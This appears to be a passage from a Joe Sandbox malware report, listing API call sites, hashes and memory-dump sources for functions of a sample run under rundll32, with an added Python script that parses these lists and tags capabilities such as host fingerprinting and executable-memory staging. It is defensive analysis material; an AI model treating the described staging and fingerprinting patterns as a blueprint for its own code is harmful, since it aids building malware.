                                • Instruction Fuzzy Hash: 1621EC76900208FFDB11EFE9D9849EEBBB8FF49200B5444AAE501EB244E7B09B45DB54
                                Uniqueness

                                Uniqueness Score: -1.00%
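
                                 The function summaries in this report are flat lists of API call sites, which are slow to compare by eye. The Python below is an added example for this page, not code from Joe Sandbox or from the sample: it parses "APIs" blocks in this report's bullet format into structured records and tags a function by the API combination it uses. GetUserNameW plus GetComputerNameW followed by WideCharToMultiByte with code page 0xFDE9 (CP_UTF8) is the host-fingerprint routine decompiled above; VirtualAlloc with flProtect 0x40 (PAGE_EXECUTE_READWRITE) marks the 16 MB staging region in the function at 0348C228. The regular expression, the rule table and the tag names are this example's own assumptions; the two sample blocks are copied verbatim from the report text above.

```python
"""Parse the 'APIs' bullet lists of a Joe Sandbox function summary and tag each
function with the capability its API combination implies.

Added example for this report page; not Joe Sandbox code.  The regex, the rule
table and the tag names are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# One bullet per API call.  The optional "Part of subcall function XXXXXXXX:" prefix
# marks a call made by a callee; the trailing "ref:" is the call-site address.
# Calls without an argument list ("GetCurrentThreadId.KERNEL32 ref: ...") also match.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]       # raw hex tokens; "?" where the plugin could not resolve a value
    ref: str              # call-site address, "" when absent
    subcall_of: str = ""  # callee address, "" when the function itself makes the call


def parse_api_block(text: str) -> List[ApiCall]:
    """Return the API calls listed in one 'APIs' block; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"] or "", m["sub"] or ""))
    return calls


# Each rule fires when every listed API appears in the function (or, optionally, a callee).
# Assumed rule set for this example, chosen from combinations seen in the report above.
CAPABILITY_RULES: Dict[str, Set[str]] = {
    "host-fingerprint":   {"GetUserNameW", "GetComputerNameW"},
    "temp-file-staging":  {"GetTempPathA", "GetTempFileNameA"},
    "named-mutex-sync":   {"CreateMutexA", "OpenMutexA"},
    "shared-section-ipc": {"CreateFileMappingW", "UnmapViewOfFile"},
}

PAGE_EXECUTE_READWRITE = 0x40   # VirtualAlloc flProtect
CP_UTF8 = 0xFDE9                # WideCharToMultiByte CodePage


def _hex_arg(call: ApiCall, index: int):
    """Argument at `index` as an int, or None when it is unknown ('?') or absent."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def tag_function(calls: List[ApiCall], include_subcalls: bool = True) -> Set[str]:
    """Capability tags for one function, from its API set plus a few telling argument values."""
    relevant = [c for c in calls if include_subcalls or not c.subcall_of]
    names = {c.api for c in relevant}
    tags = {tag for tag, needed in CAPABILITY_RULES.items() if needed <= names}
    for c in relevant:
        # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect): an RWX region is
        # the usual staging area for unpacked or injected code.
        if c.api == "VirtualAlloc" and _hex_arg(c, 3) == PAGE_EXECUTE_READWRITE:
            tags.add("rwx-allocation")
        if c.api == "WideCharToMultiByte" and _hex_arg(c, 0) == CP_UTF8:
            tags.add("utf8-encoding")
    return tags


# Two 'APIs' blocks copied from the report above (functions at 0348833B and 0348C228).
HOST_ID_BLOCK = """
• GetUserNameW.ADVAPI32(00000000,?), ref: 0348833B
• GetComputerNameW.KERNEL32(00000000,?), ref: 03488357
  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
• GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 03488391
• GetComputerNameW.KERNEL32(?,?), ref: 034883B4
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 034883D7
"""

LOADER_BLOCK = """
• RtlImageNtHeader.NTDLL(00000000), ref: 0348C228
  • Part of subcall function 0347A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03477D5E), ref: 0347A6BE
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,034789E4,00000000), ref: 0348C26A
• VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,034789E4,00000000), ref: 0348C2D5
• GetLastError.KERNEL32(?,00000000,034789E4,00000000,?,?,?,?,?,?,?,03479100,?), ref: 0348C30D
"""

if __name__ == "__main__":
    for name, block in (("0348833B", HOST_ID_BLOCK), ("0348C228", LOADER_BLOCK)):
        calls = parse_api_block(block)
        print(name, len(calls), "calls ->", sorted(tag_function(calls)))
```

                                 Feed it the "APIs" block of any function in this report; passing `include_subcalls=False` restricts the tags to calls the function makes itself, which separates a routine that builds the fingerprint from one that merely calls it.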

                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • DeleteFileA.KERNEL32(00000000,000004D2), ref: 03473090
                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03473099
                                • GetLastError.KERNEL32 ref: 034730A3
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03473162
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 3543646443-0
                                • Opcode ID: cdb10ef17604eed60fdeb1c0a77030c37e9749c0e3c6ef589f73e05c0b40e2dc
                                • Instruction ID: 5cd78648677cfa314eb30b784e9ee4f7637099450f817eee1bc6699df09f6786
                                • Opcode Fuzzy Hash: cdb10ef17604eed60fdeb1c0a77030c37e9749c0e3c6ef589f73e05c0b40e2dc
                                • Instruction Fuzzy Hash: 812181B6102210BFC650FBE9EC9AE8A37DC9F5A210B060557B605EF245D624E9058BFD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03481C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03481C25
                                  • Part of subcall function 03481C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 03481C3B
                                  • Part of subcall function 03481C19: _snwprintf.NTDLL ref: 03481C60
                                  • Part of subcall function 03481C19: CreateFileMappingW.KERNEL32(000000FF,0349A1E8,00000004,00000000,00001000,?), ref: 03481C7C
                                  • Part of subcall function 03481C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03481C8E
                                  • Part of subcall function 03481C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 03481CC6
                                • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03482F89
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03482F92
                                • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03482FD9
                                • GetLastError.KERNEL32(03483959,00000000,00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03483008
                                • CloseHandle.KERNEL32(00000000,03483959,00000000,00000000,?,?,?,?,?,?,?,03479100,?), ref: 03483018
                                  • Part of subcall function 0347C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0347171E,?,?,00000000,?), ref: 0347C2B6
                                  • Part of subcall function 0347C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0347171E,?,?,00000000,?), ref: 0347C2DE
                                  • Part of subcall function 0347C2AA: memset.NTDLL ref: 0347C2F0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                • String ID:
                                • API String ID: 1106445334-0
                                • Opcode ID: 083360fee7760b44ff6940cb635771a5ed41e746119539e73716e03321e99a7e
                                • Instruction ID: e4f4f9c660c1714da52c332a14fdfb8402ff8568e7e53faa7ceb464a8d7167c6
                                • Opcode Fuzzy Hash: 083360fee7760b44ff6940cb635771a5ed41e746119539e73716e03321e99a7e
                                • Instruction Fuzzy Hash: 9221FF39600305AFDB11FF76EC01A5F77ECAF05610B14086BEA41EE214EB71D802DBA8
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0347148A,?,?,?), ref: 0348A66F
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,0347148A,?,?,?), ref: 0348A67F
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0347148A,?,?,?), ref: 0348A6AB
                                • GetLastError.KERNEL32(?,?,0347148A,?,?,?), ref: 0348A6D0
                                • CloseHandle.KERNEL32(000000FF,?,?,0347148A,?,?,?), ref: 0348A6E1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastReadSize
                                • String ID:
                                • API String ID: 3577853679-0
                                • Opcode ID: 976437b09d892f881ef904f9729eb2cc449272ecaf107500c907ea53af43b4d9
                                • Instruction ID: 707ecda0cfb28a7eb47163e83aedbf586e68ba402c3ac9b4e74da7cde8f0ef91
                                • Opcode Fuzzy Hash: 976437b09d892f881ef904f9729eb2cc449272ecaf107500c907ea53af43b4d9
                                • Instruction Fuzzy Hash: FC115032100214BFDB21BF64CC88AAFBB9CEB053A0F150527FC55BF264D6B19C418798
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?), ref: 034775E9
                                • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?), ref: 03477602
                                • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 0347762A
                                • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 03477639
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?), ref: 03477670
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Trim$FreeHeap
                                • String ID:
                                • API String ID: 2132463267-0
                                • Opcode ID: 79ed2f2eaadee3cc9fbea7776d74b63736733160176c3ac5ce37163c497d113e
                                • Instruction ID: fced4aac806790f144a0f6c05bdbbc6ce20da5a2fe76372d203df2a08a5e1372
                                • Opcode Fuzzy Hash: 79ed2f2eaadee3cc9fbea7776d74b63736733160176c3ac5ce37163c497d113e
                                • Instruction Fuzzy Hash: C1118E32200205BBD722EB6DDC85FEB7BECDB556A4F550027BA09EF255EB70D8018794
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,02CCD5A8,?,?,00000000,00000000,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C), ref: 034838D4
                                • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 03483904
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 03483913
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03483931
                                • GetLastError.KERNEL32(?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 03483941
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                • String ID:
                                • API String ID: 653387826-0
                                • Opcode ID: 37eaf206417bc426a5882ac1a6972f2b8ad3fbadd62458bfcd40db14603a7c63
                                • Instruction ID: af90cda663181861d305f38e4eaa388bf1b617affb2774fa5b5e73bd12d2227d
                                • Opcode Fuzzy Hash: 37eaf206417bc426a5882ac1a6972f2b8ad3fbadd62458bfcd40db14603a7c63
                                • Instruction Fuzzy Hash: B4213DB9600702EFD711EFA9C984A4ABBF8FF08710710856AEA5ADB700D770E944CF94
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • InterlockedIncrement.KERNEL32(0349A06C), ref: 03483785
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 034837DC
                                • InterlockedDecrement.KERNEL32(0349A06C), ref: 034837F1
                                • DeleteFileA.KERNEL32(00000000), ref: 0348380F
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348381D
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                  • Part of subcall function 0347A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0347A391
                                  • Part of subcall function 0347A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0347A3BD
                                  • Part of subcall function 0347A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0347A3CD
                                  • Part of subcall function 0347A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0347A405
                                  • Part of subcall function 0347A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0347A427
                                  • Part of subcall function 0347A316: GetShellWindow.USER32 ref: 0347A436
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                                • String ID:
                                • API String ID: 1587453479-0
                                • Opcode ID: bb75ae476ce56eac3670e5c84482766c8216efdcd8006bbbe8faa596dde45139
                                • Instruction ID: ce1c787e301bb4aaf3793ab599f49de62e3d997f01546196a8554961f17632a8
                                • Opcode Fuzzy Hash: bb75ae476ce56eac3670e5c84482766c8216efdcd8006bbbe8faa596dde45139
                                • Instruction Fuzzy Hash: C511517D500208BFDB12FFA5CC85EAE7EADEB55690F108067FA05AE201D771C9449BA4
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 03487436
                                • GetLastError.KERNEL32 ref: 03487459
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0348746C
                                • GetLastError.KERNEL32 ref: 03487477
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034874BF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                • String ID:
                                • API String ID: 1671499436-0
                                • Opcode ID: 6e169f3a2b753bcf5e39509ad448ed266dd4c0bca4483231455da01ae235ee10
                                • Instruction ID: 9fb51f3b349f80c27aaeed854eeeff476b0cd21aaae15ed645f2816693acb1d0
                                • Opcode Fuzzy Hash: 6e169f3a2b753bcf5e39509ad448ed266dd4c0bca4483231455da01ae235ee10
                                • Instruction Fuzzy Hash: D321DE30100204EBEB22EF91D989F5EBFB9EF42B14F34045AE182AE2A0D7749D84CB14
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034726E7
                                • memcpy.NTDLL(00000000,?,?,?), ref: 03472710
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 03472739
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 03472759
                                • RegCloseKey.ADVAPI32(?), ref: 03472764
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$AllocateCloseCreateHeapmemcpy
                                • String ID:
                                • API String ID: 2954810647-0
                                • Opcode ID: 1e6da939070842c2777164a0892e40e3655825bb445ebe008d89ba89762d31c5
                                • Instruction ID: 510d79bb1b7868ef856abf80b39a3dad44aa14b15754146f1a45ac0ab43decc6
                                • Opcode Fuzzy Hash: 1e6da939070842c2777164a0892e40e3655825bb445ebe008d89ba89762d31c5
                                • Instruction Fuzzy Hash: 02114F76100209AFDF11AE65AD84EEB76BDEB54251F04442BFD01BA290D6718920D7A5
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(0347980C,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E59A
                                • memcpy.NTDLL(0347980C,?,00000009,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E5BC
                                • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0347E5D4
                                • lstrlenW.KERNEL32(00000000,00000001,0347980C,?,?,?,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E5F4
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E619
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                • String ID:
                                • API String ID: 3065863707-0
                                • Opcode ID: ea3fac1977d54d94a7dfcd85b699a9163c17628ffc590f1e51653eeb5d84bb9d
                                • Instruction ID: c01560ff33907f805fd64c241a39596b437b2a5b8abe524dbe44a44ab18f4aba
                                • Opcode Fuzzy Hash: ea3fac1977d54d94a7dfcd85b699a9163c17628ffc590f1e51653eeb5d84bb9d
                                • Instruction Fuzzy Hash: C6116379D00208BFCB21EFA5D809FCE7BF8AB19350F004056FA09EE285E6749648CB64
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • lstrcmpi.KERNEL32(00000000,?), ref: 0348FEC3
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0348FED0
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 0348FEE3
                                • lstrcmpi.KERNEL32(0349A440,00000000), ref: 0348FF03
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0347404D,00000000), ref: 0348FF17
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                • String ID:
                                • API String ID: 1266740956-0
                                • Opcode ID: fee6b438fa14b9ee434106141204991e8f207f072d59a1eafdcfddf4b259ee8d
                                • Instruction ID: 8b03ba42896dab071b82945d54b2cb4a8c2775cc7a6e0113bf591268da50d3e5
                                • Opcode Fuzzy Hash: fee6b438fa14b9ee434106141204991e8f207f072d59a1eafdcfddf4b259ee8d
                                • Instruction Fuzzy Hash: 2F118132900205EFDB05EB58D849A5EFBE8FF59328F15405BE905EB240D7349D05CBA8
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,00000000,03493716,00000000,03482466,?,?,?,03488A07,?,?,?,00000000,00000001,00000000,?), ref: 0347326D
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(00000000,?), ref: 03473291
                                • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,03488A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 03473298
                                • lstrcpy.KERNEL32(00000000,?), ref: 034732E0
                                • lstrcat.KERNEL32(00000000,?), ref: 034732EF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                • String ID:
                                • API String ID: 2616531654-0
                                • Opcode ID: b6c0314506ca3432718aa6959f458b648ccd42dc5e5fb0d1c1f18b0eba95f5d0
                                • Instruction ID: 9fe63c7c5ebc0e2e3fea033433706319ec87a8f6e5e51e62f8b2bc543b5f2c99
                                • Opcode Fuzzy Hash: b6c0314506ca3432718aa6959f458b648ccd42dc5e5fb0d1c1f18b0eba95f5d0
                                • Instruction Fuzzy Hash: 9D11A37A2002069BD721EF699C89EABB7ECEB95200F19012AF505EB244EB24D50597A5
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0347243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0348D58C
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348E3F6
                                • memcpy.NTDLL(00000000,?,?), ref: 0348E409
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0348E41A
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 0348E42F
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0348E467
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                • String ID:
                                • API String ID: 2349942465-0
                                • Opcode ID: b474b98bd83727fef4860030f9e075f31e74214256f5b17fad02fa385db8a202
                                • Instruction ID: 9abe0570ac02b8edd4fc24c3a4d3d63237b187939c157414c3e1766ac2d4e632
                                • Opcode Fuzzy Hash: b474b98bd83727fef4860030f9e075f31e74214256f5b17fad02fa385db8a202
                                • Instruction Fuzzy Hash: 5C11CE76101210EFD711BF28EC48C6FBBE8EB8A229716456FFD09AF214D6315C458AA9
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(0347C1F8,00000000,00000000,00000000,?,03480FD9,?,0347C1F8,00000000), ref: 03484D2D
                                • lstrlen.KERNEL32(?,?,03480FD9,?,0347C1F8,00000000), ref: 03484D34
                                • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 03484D42
                                  • Part of subcall function 0347EEF2: GetLocalTime.KERNEL32(?,?,?,?,0348FC9E,00000000,00000001), ref: 0347EEFC
                                  • Part of subcall function 0347EEF2: wsprintfA.USER32 ref: 0347EF2F
                                • wsprintfA.USER32 ref: 03484D64
                                  • Part of subcall function 0347ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,03484D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0347ED66
                                  • Part of subcall function 0347ED48: wsprintfA.USER32 ref: 0347ED8B
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 03484D95
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                • String ID:
                                • API String ID: 3847261958-0
                                • Opcode ID: 5001fd9d18a821a30ddfec542931a0eb95b284152af9512849c0c8eccaf71e72
                                • Instruction ID: 421e3a1561b738d4034952986221e04e3463bb5064d135779aafcc209fd22f63
                                • Opcode Fuzzy Hash: 5001fd9d18a821a30ddfec542931a0eb95b284152af9512849c0c8eccaf71e72
                                • Instruction Fuzzy Hash: DD01A135100218BFDB127F26EC44DAF7FA9EF95360B158023FD08AE215D6329955DBA4
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD35
                                • ResetEvent.KERNEL32(?,?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD3A
                                • GetLastError.KERNEL32(0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD55
                                • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD84
                                  • Part of subcall function 0347D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?,?,00000000), ref: 0347D435
                                  • Part of subcall function 0347D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?), ref: 0347D493
                                  • Part of subcall function 0347D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0347D4A3
                                • SetEvent.KERNEL32(?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD76
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 1449191863-0
                                • Opcode ID: 18e28eba467165ca47b1165072ff888136495f29956f10e579e69d032e21a353
